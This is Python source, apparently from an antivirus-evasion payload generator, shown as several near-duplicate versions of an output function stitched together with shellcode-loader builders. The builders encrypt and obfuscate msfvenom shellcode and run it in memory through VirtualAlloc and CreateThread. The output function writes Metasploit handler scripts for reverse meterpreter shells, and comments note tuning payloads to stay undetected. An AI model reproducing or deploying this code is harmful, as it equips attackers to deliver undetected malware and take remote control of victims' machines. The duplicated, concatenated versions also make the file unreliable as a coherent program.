', ' + RandCorrectLetter + ')\n\n')
PayloadFile.write(SubbedShellcodeVariableName + ' = \"' +
Shellcode.translate(SubScheme) + '\"\n\n')
PayloadFile.write(SubbedShellcodeVariableName + ' = ' +
SubbedShellcodeVariableName + '.translate(' +
RandSubScheme + ')\n')
PayloadFile.write(ShellcodeVariableName + ' = bytearray(' +
SubbedShellcodeVariableName +
'.decode(\"string_escape\"))\n\n')
PayloadFile.write(
RandPtr +
' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('
+ ShellcodeVariableName +
')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' +
ShellcodeVariableName + ')).from_buffer(' +
ShellcodeVariableName + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' +
RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' +
ShellcodeVariableName + ')))\n\n')
PayloadFile.write(
RandHt +
' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int('
+ RandPtr +
'),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n'
)
PayloadFile.write(
'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt +
'),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
def OutputMenu(self, payload, code, showTitle=True, interactive=True, OutputBaseChoice=""):
"""
Write a chunk of payload code to a specified ouput file base.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
# if we get .exe code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe":
outputFolder = veil.PAYLOAD_COMPILED_PATH
else:
outputFolder = veil.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
print " [*] Press [enter] for 'payload'"
OutputBaseChoice = raw_input(" [>] Please enter the base name for output files: ")
if OutputBaseChoice == "":
OutputBaseChoice = "payload"
# set the output name to /outout/source/BASENAME.EXT
OutputFileName = outputFolder + OutputBaseChoice + "." + payload.extension
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
x = 1
while os.path.isfile(OutputFileName):
OutputFileName = outputFolder + OutputBaseChoice + str(x) + "." + payload.extension
x += 1
OutputFile = open(OutputFileName, "w")
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
message = "\n Language:\t\t" + helpers.color(payload.language) + "\n Payload:\t\t" + payload.shortname
if hasattr(payload, "shellcode"):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += " " + option + " "
message += parts.strip()
# if required options were specified, output them
if hasattr(payload, "required_options"):
message += "\n Required Options:\t"
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += t.strip()
message += "\n Source File:\t\t" + OutputFileName + "\n"
# print out notes if set
if hasattr(payload, "notes"):
message += " Notes:\t\t\t" + payload.notes
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, "required_options"):
if "compile_to_exe" in self.payload.required_options:
value = self.payload.required_options["compile_to_exe"][0].lower()[0]
if value == "y" or value == True:
if interactive:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {})
else:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {"method": "pyinstaller"})
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
if interactive:
raw_input(" [>] press any key to return to the main menu: ")
self.MainMenu(showMessage=True)
def OutputMenu(self, payload, code, showTitle=True, interactive=True, OutputBaseChoice=""):
"""
Write a chunk of payload code to a specified ouput file base.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
# if we get .exe code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe":
outputFolder = veil.PAYLOAD_COMPILED_PATH
else:
outputFolder = veil.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
print " [*] Press [enter] for 'payload'"
OutputBaseChoice = raw_input(" [>] Please enter the base name for output files: ")
if OutputBaseChoice == "": OutputBaseChoice = "payload"
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(list(set([x.split(".")[0] for x in filenames if x.split(".")[0] != ''])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, 'w')
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
message = "\n Language:\t\t"+helpers.color(payload.language)+"\n Payload:\t\t"+payload.shortname
if hasattr(payload, 'shellcode'):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += ' ' + option + ' '
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, 'required_options'):
message += "\n Required Options:\t"
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += t.strip()
message += "\n Source File:\t\t"+OutputFileName + "\n"
# print out notes if set
if hasattr(payload, 'notes'):
#message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:", payload.notes, frontTab=False, spacing=24)
message += "\n"
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, 'required_options'):
if "compile_to_exe" in self.payload.required_options:
value = self.payload.required_options['compile_to_exe'][0].lower()[0]
if value == "y" or value==True:
if interactive:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {})
else:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {'method':'pyinstaller'})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = veil.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
if interactive:
raw_input(" [>] press any key to return to the main menu: ")
#self.MainMenu(showMessage=True)
return OutputFileName
def OutputMenu(self, payload, code, showTitle=True, interactive=True, OutputBaseChoice=""):
"""
Write a chunk of payload code to a specified ouput file base.
Also outputs a handler script if required from the options.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
# if we get .exe code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
print " [*] Press [enter] for 'payload'"
OutputBaseChoice = raw_input(" [>] Please enter the base name for output files: ")
if OutputBaseChoice == "": OutputBaseChoice = "payload"
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(list(set([x.split(".")[0] for x in filenames if x.split(".")[0] != ''])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, 'w')
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
message = "\n Language:\t\t"+helpers.color(payload.language)+"\n Payload:\t\t"+payload.shortname
if hasattr(payload, 'shellcode'):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + payload.shellcode.msfvenompayload + "\n"
handler += "set LHOST 0.0.0.0\n"
# extract LPORT if it's there
p = re.compile('LPORT=(.*?) ')
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
handler += "set ExitOnSession false\n"
handler += "set AutoRunScript post/windows/manage/migrate\n"
handler += "exploit -j\n"
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += ' ' + option + ' '
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, 'required_options'):
message += "\n Required Options:\t"
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += t.strip()
# check if any options specify that we should build a handler out
keys = payload.required_options.keys()
if "LHOST" in keys:
handler = "use exploit/multi/handler\n"
# do our best to determine the payload type
# handle options from the backdoor factory
if "payload" in keys:
p = payload.required_options["payload"][0]
if "tcp" in p:
handler += "set PAYLOAD windows/meterpreter/reverse_tcp\n"
elif "https" in p:
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
elif "shell" in p:
handler += "set PAYLOAD windows/shell_reverse_tcp\n"
else: pass
# if not BDF, try to extract the handler type from the payload name
else:
if "tcp" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_tcp\n"
elif "https" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
elif "http" in payload.shortname.lower():
handler += "set PAYLOAD windows/meterpreter/reverse_https\n"
else: pass
handler += "set LHOST 0.0.0.0\n"
if "LPORT" in keys:
handler += "set LPORT " + payload.required_options["LPORT"][0] + "\n"
handler += "set ExitOnSession false\n"
handler += "set AutoRunScript post/windows/manage/migrate\n"
handler += "exploit -j\n"
message += "\n Payload File:\t\t"+OutputFileName + "\n"
# if we're generating the handler script, write it out
try:
if settings.GENERATE_HANDLER_SCRIPT.lower() == "true":
handlerFileName = settings.HANDLER_PATH + FinalBaseChoice + "_handler.rc"
handlerFile = open(handlerFileName, 'w')
handlerFile.write(handler)
handlerFile.close()
message += " Handler File:\t\t"+handlerFileName + "\n"
except:
# is that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color("\n [!] Please run ./config/update.py !", warning=True)
# print out notes if set
if hasattr(payload, 'notes'):
#message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:", payload.notes, frontTab=False, spacing=24)
message += "\n"
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, 'required_options'):
if "compile_to_exe" in self.payload.required_options:
value = self.payload.required_options['compile_to_exe'][0].lower()[0]
if value == "y" or value==True:
if interactive:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {})
else:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {'method':'pyinstaller'})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
if interactive:
raw_input(" [>] press any key to return to the main menu: ")
#self.MainMenu(showMessage=True)
return OutputFileName
def OutputMenu(self, payload, code, showTitle=True, interactive=True, OutputBaseChoice=""):
"""
Write a chunk of payload code to a specified ouput file base.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
# if we get .exe code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
print " [*] Press [enter] for 'payload'"
OutputBaseChoice = raw_input(" [>] Please enter the base name for output files: ")
if OutputBaseChoice == "": OutputBaseChoice = "payload"
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(list(set([x.split(".")[0] for x in filenames if x.split(".")[0] != ''])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, 'w')
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
message = "\n Language:\t\t"+helpers.color(payload.language)+"\n Payload:\t\t"+payload.shortname
if hasattr(payload, 'shellcode'):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += ' ' + option + ' '
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, 'required_options'):
message += "\n Required Options:\t"
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += t.strip()
message += "\n Source File:\t\t"+OutputFileName + "\n"
# print out notes if set
if hasattr(payload, 'notes'):
#message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:", payload.notes, frontTab=False, spacing=24)
message += "\n"
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, 'required_options'):
if "compile_to_exe" in self.payload.required_options:
value = self.payload.required_options['compile_to_exe'][0].lower()[0]
if value == "y" or value==True:
if interactive:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {})
else:
supportfiles.supportingFiles(self.payload.language, OutputFileName, {'method':'pyinstaller'})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
if interactive:
raw_input(" [>] press any key to return to the main menu: ")
#self.MainMenu(showMessage=True)
return OutputFileName
def OutputMenu(self, payload, code, showTitle=True, interactive=True, args=None):
"""
Write a chunk of payload code to a specified ouput file base.
Also outputs a handler script if required from the options.
code = the source code to write
OutputBaseChoice = "payload" or user specified string
Returns the full name the source was written to.
"""
OutputBaseChoice = ""
overwrite = False
# if we have arguments passed, extract out the values we want
if args:
OutputBaseChoice = args.o
overwrite = args.overwrite
# if we get .exe or ELF (with no base) code back, output to the compiled folder, otherwise write to the source folder
if payload.extension == "exe" or payload.extension == "war":
outputFolder = settings.PAYLOAD_COMPILED_PATH
# Check for ELF binary
elif hasattr(payload, "type") and payload.type == "ELF":
outputFolder = settings.PAYLOAD_COMPILED_PATH
else:
outputFolder = settings.PAYLOAD_SOURCE_PATH
# only show get input if we're doing the interactive menu
if interactive:
if showTitle:
if settings.TERMINAL_CLEAR != "false":
messages.title()
# Get the base install name for the payloads (i.e. OutputBaseChoice.py/OutputBaseChoice.exe)
OutputBaseChoice = raw_input("\n [>] Please enter the base name for output files (default is 'payload'): ")
# ensure we get a base name and not a full path
while OutputBaseChoice != "" and "/" in OutputBaseChoice:
print helpers.color(" [!] Please provide a base name, not a path, for the output base", warning=True)
OutputBaseChoice = raw_input(
"\n [>] Please enter the base name for output files (default is 'payload'): "
)
# for invalid output base choices that are passed by arguments
else:
if "/" in OutputBaseChoice:
print helpers.color(" [!] Please provide a base name, not a path, for the output base", warning=True)
print helpers.color(" [!] Defaulting to 'payload' for output base...", warning=True)
OutputBaseChoice = "payload"
if OutputBaseChoice == "":
OutputBaseChoice = "payload"
# if we are overwriting, this is the base choice used
FinalBaseChoice = OutputBaseChoice
# if we're not overwriting output files, walk the existing and increment
if not overwrite:
# walk the output path and grab all the file bases, disregarding extensions
fileBases = []
for (dirpath, dirnames, filenames) in os.walk(outputFolder):
fileBases.extend(list(set([x.split(".")[0] for x in filenames if x.split(".")[0] != ""])))
break
# as long as the file exists, increment a counter to add to the filename
# i.e. "payload3.py", to make sure we don't overwrite anything
FinalBaseChoice = OutputBaseChoice
x = 1
while FinalBaseChoice in fileBases:
FinalBaseChoice = OutputBaseChoice + str(x)
x += 1
# set the output name to /outout/source/BASENAME.EXT unless it is an ELF then no extension
if hasattr(payload, "type") and payload.type == "ELF":
OutputFileName = outputFolder + FinalBaseChoice + payload.extension
else:
OutputFileName = outputFolder + FinalBaseChoice + "." + payload.extension
OutputFile = open(OutputFileName, "w")
OutputFile.write(code)
OutputFile.close()
# start building the information string for the generated payload
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :]).split(".")[0].split("/")[1:]
)
message = "\n Language:\t\t" + helpers.color(payload.language) + "\n Payload:\t\t" + payloadname
handler = ""
if hasattr(payload, "shellcode"):
# check if msfvenom was used or something custom, print appropriately
if payload.shellcode.customshellcode != "":
message += "\n Shellcode:\t\tcustom"
else:
message += "\n Shellcode:\t\t" + payload.shellcode.msfvenompayload
# if the shellcode wasn't custom, build out a handler script
handler = "use exploit/multi/handler\n"
handler += "set PAYLOAD " + payload.shellcode.msfvenompayload + "\n"
# extract LHOST if it's there
p = re.compile("LHOST=(.*?) ")
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LHOST " + parts[0] + "\n"
else:
# try to extract this local IP
handler += "set LHOST " + helpers.LHOST() + "\n"
# extract LPORT if it's there
p = re.compile("LPORT=(.*?) ")
parts = p.findall(payload.shellcode.msfvenomCommand)
if len(parts) > 0:
handler += "set LPORT " + parts[0] + "\n"
# Removed autoscript smart migrate due to users on forum saying that migrate itself caused detection
# in an otherwise undetectable (at the time) payload
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
# print out any msfvenom options we used in shellcode generation if specified
if len(payload.shellcode.options) > 0:
message += "\n Options:\t\t"
parts = ""
for option in payload.shellcode.options:
parts += " " + option + " "
message += parts.strip()
# reset the internal shellcode state the options don't persist
payload.shellcode.Reset()
# if required options were specified, output them
if hasattr(payload, "required_options"):
t = ""
# sort the dictionary by key before we output, so it looks nice
for key in sorted(payload.required_options.iterkeys()):
t += " " + key + "=" + payload.required_options[key][0] + " "
message += "\n" + helpers.formatLong("Required Options:", t.strip(), frontTab=False, spacing=24)
# check if any options specify that we should build a handler out
keys = payload.required_options.keys()
# assuming if LHOST is set, we need a handler script
if "LHOST" in keys or "RHOST" in keys:
handler = "use exploit/multi/handler\n"
# do our best to determine the payload type
architecture = ""
if hasattr(payload, "architecture") and payload.architecture == "64":
architecture = "x64/"
# handle options from the backdoor factory
if "payload" in keys:
p = payload.required_options["payload"][0]
if "rev_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
elif "bind_tcp" in p:
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
elif "https" in p:
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
elif "shell" in p:
handler += "set PAYLOAD windows/%sshell_reverse_tcp\n" % architecture
else:
pass
# if not BDF, try to extract the handler type from the payload name
else:
# extract the payload class name from the instantiated object, then chop off the load folder prefix
payloadname = "/".join(
str(str(payload.__class__)[str(payload.__class__).find("payloads") :])
.split(".")[0]
.split("/")[1:]
)
# pure rev_tcp stager
if "rev_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_tcp\n" % architecture
# pure bind_tcp stager
elif "bind_tcp" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/bind_tcp\n" % architecture
# pure rev_https stager
elif "https" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_https\n" % architecture
# pure rev_http stager
elif "http" in payloadname.lower():
handler += "set PAYLOAD windows/%smeterpreter/reverse_http\n" % architecture
else:
pass
# grab the LHOST value
if "LHOST" in keys:
handler += "set LHOST " + payload.required_options["LHOST"][0] + "\n"
if "RHOST" in keys:
handler += "set RHOST " + payload.required_options["RHOST"][0] + "\n"
# grab the LPORT value if it was set
if "LPORT" in keys:
handler += "set LPORT " + payload.required_options["LPORT"][0] + "\n"
# grab the LURI value if it was set. ignore the / as that is the default
if "LURI" in keys and payload.required_options["LURI"][0] != "/":
handler += "set LURI " + payload.required_options["LURI"][0] + "\n"
handler += "set ExitOnSession false\n"
handler += "exploit -j\n"
message += "\n Payload File:\t\t" + OutputFileName + "\n"
# if we're generating the handler script, write it out
try:
if settings.GENERATE_HANDLER_SCRIPT.lower() == "true":
if handler != "":
handlerFileName = settings.HANDLER_PATH + FinalBaseChoice + "_handler.rc"
handlerFile = open(handlerFileName, "w")
handlerFile.write(handler)
handlerFile.close()
message += " Handler File:\t\t" + handlerFileName + "\n"
except:
# is that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
"\n [!] Internal error #1. Please run %s manually\n" % (os.path.abspath("./config/update.py")),
warning=True,
)
# print out notes if set
if hasattr(payload, "notes"):
# message += " Notes:\t\t\t" + payload.notes
message += helpers.formatLong("Notes:", payload.notes, frontTab=False, spacing=24)
# check if compile_to_exe is in the required options, if so,
# call supportfiles.supportingFiles() to compile appropriately
if hasattr(self.payload, "required_options") and self.payload.language.lower() != "powershell":
if "COMPILE_TO_EXE" in self.payload.required_options:
value = self.payload.required_options["COMPILE_TO_EXE"][0].lower()[0]
if value == "y" or value == True:
# check if the --pwnstaller flag was passed
if args and args.pwnstaller:
supportfiles.supportingFiles(self.payload, OutputFileName, {"method": "pwnstaller"})
else:
# if interactive, allow the user to choose the method
if interactive:
supportfiles.supportingFiles(self.payload, OutputFileName, {})
# otherwise specify the default, pyinstaller
else:
supportfiles.supportingFiles(self.payload, OutputFileName, {"method": "pyinstaller"})
# if we're compiling, set the returned file name to the output .exe
# so we can return this for external calls to the framework
OutputFileName = settings.PAYLOAD_COMPILED_PATH + FinalBaseChoice + ".exe"
# This block of code is going to be used to SHA1 hash our compiled payloads to potentially submit the
# hash with VTNotify to detect if it's been flagged
try:
CompiledHashFile = settings.HASH_LIST
HashFile = open(CompiledHashFile, "a")
OutputFile = open(OutputFileName, "rb")
Sha1Hasher = hashlib.sha1()
Sha1Hasher.update(OutputFile.read())
SHA1Hash = Sha1Hasher.hexdigest()
OutputFile.close()
HashFile.write(SHA1Hash + ":" + FinalBaseChoice + "\n")
HashFile.close()
# print the full message containing generation notes
print message
# print the end message
messages.endmsg()
except:
# if that option fails, it probably means that the /etc/veil/settings.py file hasn't been updated
print helpers.color(
"\n [!] Internal error #2. Unable to generate output. Please run %s manually\n"
% (os.path.abspath("./config/update.py")),
warning=True,
)
if interactive:
raw_input(" [>] Press any key to return to the main menu.")
print ""
self.MainMenu(showMessage=True)
return OutputFileName
def pyAESVAlloc():
# Generate Shellcode Using msfvenom
Shellcode = shellcode.genShellcode()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Set AES Block Size and Padding
BlockSize = 32
Padding = '{'
# Function for Padding Encrypted Text to Fit the Block
pad = lambda s: s + (BlockSize - len(s) % BlockSize) * Padding
# Encrypt & Encode or Decrypt & Decode a String
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(Padding)
# Generate Random AES Key
secret = aes.aesKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
# Encrypt the String
EncodedShellcode = EncodeAES(cipher, Shellcode)
# Create Payload File
PayloadFile = open('payload.py', 'w')
PayloadFile.write('#!/usr/bin/python\n\n')
PayloadFile.write('import ctypes\n')
PayloadFile.write('from Crypto.Cipher import AES\n')
PayloadFile.write('import base64\n')
PayloadFile.write('import os\n\n')
PayloadFile.write(RandPadding + ' = \'{\'\n')
PayloadFile.write(
RandDecodeAES +
' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' +
RandPadding + ')\n')
PayloadFile.write(RandCipherObject + ' = AES.new(\'' + secret + '\')\n')
PayloadFile.write(RandDecodedShellcode + ' = ' + RandDecodeAES + '(' +
RandCipherObject + ', \'' + EncodedShellcode + '\')\n')
PayloadFile.write(RandShellCode + ' = bytearray(' + RandDecodedShellcode +
'.decode("string_escape"))\n\n')
PayloadFile.write(
RandPtr +
' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('
+ RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n\n')
PayloadFile.write(RandBuf + ' = (ctypes.c_char * len(' + RandShellCode +
')).from_buffer(' + RandShellCode + ')\n\n')
PayloadFile.write('ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' +
RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' +
RandShellCode + ')))\n\n')
PayloadFile.write(
RandHt +
' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int('
+ RandPtr +
'),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n\n'
)
PayloadFile.write(
'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt +
'),ctypes.c_int(-1))')
PayloadFile.close()
# Create Supporting Files and Print Exit Message
supportfiles.supportingFiles()
messages.endmsg()
